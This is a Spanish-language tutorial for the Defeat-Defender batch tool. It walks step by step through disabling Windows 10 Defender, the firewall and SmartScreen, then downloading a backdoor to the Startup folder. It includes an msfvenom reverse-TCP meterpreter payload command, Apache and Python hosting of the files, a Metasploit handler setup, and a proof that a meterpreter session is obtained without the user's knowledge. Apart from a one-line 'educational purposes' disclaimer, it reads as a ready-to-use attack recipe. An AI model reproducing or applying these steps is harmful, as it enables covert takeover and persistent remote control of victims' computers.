Defeat-Defender Crear Payload FUD para Windows 10
Defeat-Defender Crear Payload FUD para Windows 10

Defeat-Defender: Crear Payload FUD para Windows 10

Defeat-Defender es una herramienta de código abierto que está codificado en lenguaje batch y diseñado para derrotar al defensor de la seguridad del sistema operativo de Windows y obtener acceso al sistema. Ten en cuenta que es capaz de eludir defensor del sistema operativo de Windows 10 fácilmente.

Originalmente el desarrollador de esta herramienta utiliza sólo la lógica simple para derrotar a Windows 10 Defender. Como sabemos que Windows nos permite descargar cualquier archivo por lotes desde la red externa y aprovechando esta característica, primero desmantela toda la seguridad y los defensores utilizando el símbolo del sistema administrativo de Windows y una vez hecho, descarga la carga útil (PAYLOAD) desde el servidor web de destino y lo ejecuta sin ninguna restricción.

Instalación

Descargas esta herramienta desde GitHub usando el comando git y entramos en el directorio de esta herramienta. (alternativamente, puedes descargarlo desde aquí)

git clone https://github.com/swagkarna/Defeat-Defender.git
cd Defeat-Defender
Instalar Defeat-Defender en Linux
Instalar Defeat-Defender en Linux

Crear Payload

Una vez dentro del directorio de este ordenador, crearemos un payload y moveremos el payload al directorio raíz del servidor web apache para que pueda ser alojado.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.190 lport=4444 -f exe > Windows.exe
cp Windows.exe /var/www/html/
service apache2 start
Crear Payload para Windows 10
Crear Payload para Windows 10

Nota

192.168.1.190 es tu IP Local. Puedes consultar 5 comandos para obtener la dirección IP de Linux. Puedes cambiar el nombre de Windows.exe

Mover payload al servidor apache
Mover payload al servidor apache

Ahora tenemos que editar el archivo “Defeat-Defender.bat“. Así que ábrelo con el comando nano, ve a la parte inferior y edita el siguiente código: (nota el cambio de dirección IP y nombre del archivo –Windows.exe)

sudo nano Defeat-Defender.bat
Shell

Nuevamente, hay que dar la ubicación de nuestro propio servidor web apache (IP local) junto con el nombre de payload. Ten en cuenta que debes cambiar el nombre de “Winupdate.exe” en todas partes por “Windows.exe“.

Editar archivo Defeat-Defender
Editar archivo Defeat-Defender

¡¡Muy bien!! Todo está hecho y ahora el archivo batch resaltado está listo para ser compartido. Puedes compartirlo como quieras (aquí tienes varias formas: Post-Explotación: Transferir Archivos entre Windows y Linux), pero en nuestro caso vamos a iniciar el servicio de intercambio de archivos de Python para compartir este archivo.

python -m SimpleHTTPServer
Uso de SimpleHTTPServer para Defeat-Defender
Uso de SimpleHTTPServer para Defeat-Defender

Detrás de escena

Cuando se ejecuta el archivo batch para pedir permisos de administrador, comienza a desactivar Windows Defender: protección en tiempo real, el firewall, SmartScreen, y comienza a descargar la puerta trasera del servidor y la coloca en la carpeta de inicio. La puerta trasera se ejecutará después de que se ha descargado desde el servidor, y se iniciará cada vez que el sistema se inicia.

PoC (Prueba de Concepto)

Como puedes ver, Windows Defender ya está activo en la máquina víctima.

Windows Defender activado en Windows 10
Windows Defender activado en Windows 10

¡¡Genial !! Se puede ver en la imagen de abajo que el archivo malicioso se ha descargado con éxito en una máquina de Windows sin ser detectado por Windows Defender.

Descargar archivo batch en red
Descargar archivo batch en red

Una vez que la víctima ha permitido la configuración de la aplicación, entonces aparecerá un mensaje en la pantalla como se muestra en la siguiente imagen.

Conceder permisos de ejecución de archivo batch
Conceder permisos de ejecución de archivo batch

¡¡Increíble!! Pero, en realidad obtenemos una sesión de meterpreter de ese usuario sin su conocimiento.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 4444
run
Sesión meterpreter remota de Windows
Sesión meterpreter remota de Windows

Como has visto, ha sido muy sencillo derrotar a Windows Defender en un ordenador con Windows 10. Es posible, que con el tiempo esto deje de funcionar, de hecho el repositorio ha sido archivado. Para una mayor investigación, siempre puedes descargar el código fuente desde aquí.

Descargo de Responsabilidad

Utiliza esto sólo para fines educativos.

Dark Mode

Defeat-Defender (este enlace se abre en una nueva ventana) por swagkarna (este enlace se abre en una nueva ventana)

Powerful batch script to dismantle complete windows defender protection and even bypass tamper protection ..Disable Windows-Defender Permanently….Hack windows. POC

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda
Más artículos
Escanear puertos Linux comandos Ss, Netstat, Lsof y Nmap
Escanear puertos abiertos con: Ss, Netstat, Lsof y Nmap